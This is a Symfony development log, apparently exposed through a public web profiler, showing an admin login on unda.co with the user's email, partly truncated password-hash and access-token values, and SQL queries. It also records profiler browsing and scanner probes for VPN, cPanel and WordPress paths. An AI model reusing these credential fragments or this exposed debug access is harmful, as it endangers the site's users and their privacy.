var/logs/dev.log

Open in your IDE?
  1. [2025-12-15 23:13:27] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  2. [2025-12-15 23:13:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  3. [2025-12-15 23:13:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  4. [2025-12-15 23:13:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5. [2025-12-15 23:13:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6. [2025-12-15 23:13:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7. [2025-12-15 23:13:27] security.DEBUG: Calling Authentication entry point. [] []
  8. [2025-12-15 23:13:27] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  9. [2025-12-15 23:13:28] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"c499c9","_route":"_wdt"},"request_uri":"https://auth.unda.co/_wdt/c499c9","method":"GET"} []
  10. [2025-12-15 23:13:30] request.INFO: Matched route "login". {"route":"login","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\LoginController::indexAction","domain":"auth.unda.co","_route":"login"},"request_uri":"https://auth.unda.co/login","method":"POST"} []
  11. [2025-12-15 23:13:30] doctrine.DEBUG: SELECT u0_.id AS id_0, u0_.uuid AS uuid_1, u0_.status AS status_2, u0_.date_created AS date_created_3, u0_.date_modified AS date_modified_4, u0_.name AS name_5, u0_.last_name AS last_name_6, u0_.email AS email_7, u0_.password AS password_8, u0_.media_path AS media_path_9, u0_.thumb_path AS thumb_path_10, u0_.curp AS curp_11, u0_.phone AS phone_12, u0_.email_verification AS email_verification_13, u0_.phone_verification AS phone_verification_14 FROM user u0_ WHERE (u0_.email = ?) AND (u0_.password = ?) LIMIT 1 ["julieta@underdog.mx","77ef29c36736bfdfdf1d78fee1 [...]"] []
  12. [2025-12-15 23:13:30] doctrine.DEBUG: "START TRANSACTION" [] []
  13. [2025-12-15 23:13:30] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"dace7224b1fa1587a6f593b6ae [...]","3":"2025-12-15 23:43:30","4":"","5":374,"6":"[]"} []
  14. [2025-12-15 23:13:30] doctrine.DEBUG: "COMMIT" [] []
  15. [2025-12-15 23:13:30] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  16. [2025-12-15 23:13:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  17. [2025-12-15 23:13:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  18. [2025-12-15 23:13:30] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  19. [2025-12-15 23:13:30] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  20. [2025-12-15 23:13:30] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
  21. [2025-12-15 23:13:30] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
  22. [2025-12-15 23:13:30] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
  23. [2025-12-15 23:13:30] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"julieta@underdog.mx\", authenticated=true, roles=\"ROLE_ADMIN\"))","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  24. [2025-12-15 23:13:30] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  25. [2025-12-15 23:13:30] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  26. [2025-12-15 23:13:30] security.DEBUG: Stored the security token in the session. {"key":"_security_cookie_presence"} []
  27. [2025-12-15 23:13:31] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"17eb8c","_route":"_wdt"},"request_uri":"https://admin.unda.co/_wdt/17eb8c","method":"GET"} []
  28. [2025-12-15 23:13:31] security.DEBUG: Read existing security token from the session. {"key":"_security_cookie_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  29. [2025-12-15 23:13:31] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
  30. [2025-12-15 23:13:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
  31. [2025-12-15 23:13:31] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
  32. [2025-12-15 23:13:31] security.DEBUG: User was reloaded from a user provider. {"provider":"Hona\\AdminBundle\\Security\\AdminUserProvider","username":"julieta@underdog.mx"} []
  33. [2025-12-15 23:13:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  34. [2025-12-15 23:13:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  35. [2025-12-15 23:13:31] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  36. [2025-12-15 23:13:31] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  37. [2025-12-15 23:13:31] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
  38. [2025-12-15 23:13:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
  39. [2025-12-15 23:13:31] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
  40. [2025-12-15 23:13:31] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"julieta@underdog.mx\", authenticated=true, roles=\"ROLE_ADMIN\"))","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  41. [2025-12-15 23:13:31] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  42. [2025-12-15 23:13:31] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  43. [2025-12-15 23:13:31] security.DEBUG: Stored the security token in the session. {"key":"_security_cookie_presence"} []
  44. [2025-12-15 23:13:47] request.INFO: Matched route "access_history_list". {"route":"access_history_list","route_parameters":{"size":10,"page":0,"_controller":"Hona\\AdminBundle\\Controller\\AccessHistoryController::accessHistoryListAction","_route":"access_history_list"},"request_uri":"https://admin.unda.co/access_history/list","method":"GET"} []
  45. [2025-12-15 23:13:47] security.DEBUG: Read existing security token from the session. {"key":"_security_cookie_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  46. [2025-12-15 23:13:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
  47. [2025-12-15 23:13:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
  48. [2025-12-15 23:13:47] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
  49. [2025-12-15 23:13:47] security.DEBUG: User was reloaded from a user provider. {"provider":"Hona\\AdminBundle\\Security\\AdminUserProvider","username":"julieta@underdog.mx"} []
  50. [2025-12-15 23:13:47] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  51. [2025-12-15 23:13:47] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  52. [2025-12-15 23:13:47] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  53. [2025-12-15 23:13:47] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  54. [2025-12-15 23:13:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
  55. [2025-12-15 23:13:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
  56. [2025-12-15 23:13:47] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
  57. [2025-12-15 23:13:47] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"julieta@underdog.mx\", authenticated=true, roles=\"ROLE_ADMIN\"))","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  58. [2025-12-15 23:13:47] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  59. [2025-12-15 23:13:47] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  60. [2025-12-15 23:13:47] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.date_entry AS date_entry_2, a0_.name AS name_3, a0_.last_name AS last_name_4, a0_.date_departure AS date_departure_5, CONCAT(a0_.name, ' ', a0_.last_name) AS sclr_6, CONCAT(u1_.name, ' ', u1_.last_name) AS sclr_7, CONCAT(a2_.street, ' ', a2_.outdoor_number, ' ', a2_.interior_number) AS sclr_8, d3_.model AS model_9 FROM access_history a0_ INNER JOIN address a2_ ON ((a0_.address_id = a2_.id) AND (a2_.residential_id = ?)) LEFT JOIN user u1_ ON ((a0_.user_id = u1_.id)) LEFT JOIN device d3_ ON ((u1_.id = d3_.user_id)) GROUP BY a0_.id ORDER BY a0_.date_entry DESC LIMIT 10 OFFSET 0 [15] []
  61. [2025-12-15 23:13:47] doctrine.DEBUG: SELECT count(DISTINCT a0_.id) AS sclr_0 FROM access_history a0_ INNER JOIN address a1_ ON ((a0_.address_id = a1_.id) AND (a1_.residential_id = ?)) [15] []
  62. [2025-12-15 23:13:47] security.DEBUG: Stored the security token in the session. {"key":"_security_cookie_presence"} []
  63. [2025-12-15 23:13:47] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"dd219e","_route":"_wdt"},"request_uri":"https://admin.unda.co/_wdt/dd219e","method":"GET"} []
  64. [2025-12-15 23:13:47] security.DEBUG: Read existing security token from the session. {"key":"_security_cookie_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  65. [2025-12-15 23:13:48] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
  66. [2025-12-15 23:13:48] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
  67. [2025-12-15 23:13:48] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
  68. [2025-12-15 23:13:48] security.DEBUG: User was reloaded from a user provider. {"provider":"Hona\\AdminBundle\\Security\\AdminUserProvider","username":"julieta@underdog.mx"} []
  69. [2025-12-15 23:13:48] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  70. [2025-12-15 23:13:48] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  71. [2025-12-15 23:13:48] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  72. [2025-12-15 23:13:48] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  73. [2025-12-15 23:13:48] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
  74. [2025-12-15 23:13:48] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
  75. [2025-12-15 23:13:48] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
  76. [2025-12-15 23:13:48] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"julieta@underdog.mx\", authenticated=true, roles=\"ROLE_ADMIN\"))","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  77. [2025-12-15 23:13:48] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  78. [2025-12-15 23:13:48] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  79. [2025-12-15 23:13:48] security.DEBUG: Stored the security token in the session. {"key":"_security_cookie_presence"} []
  80. [2025-12-15 23:19:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sslvpn_logon.shtml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sslvpn_logon.shtml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  81. [2025-12-15 23:33:05] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"661854","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/661854/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  82. [2025-12-15 23:33:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  83. [2025-12-15 23:33:09] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"c4001c","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/c4001c/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  84. [2025-12-15 23:33:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  85. [2025-12-15 23:33:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=cache","method":"GET"} []
  86. [2025-12-15 23:33:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  87. [2025-12-15 23:34:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  88. [2025-12-15 23:43:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  89. [2025-12-15 23:43:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/crop/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/crop/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  90. [2025-12-15 23:43:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/pomo/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/pomo/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  91. [2025-12-15 23:43:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  92. [2025-12-15 23:43:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  93. [2025-12-15 23:43:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
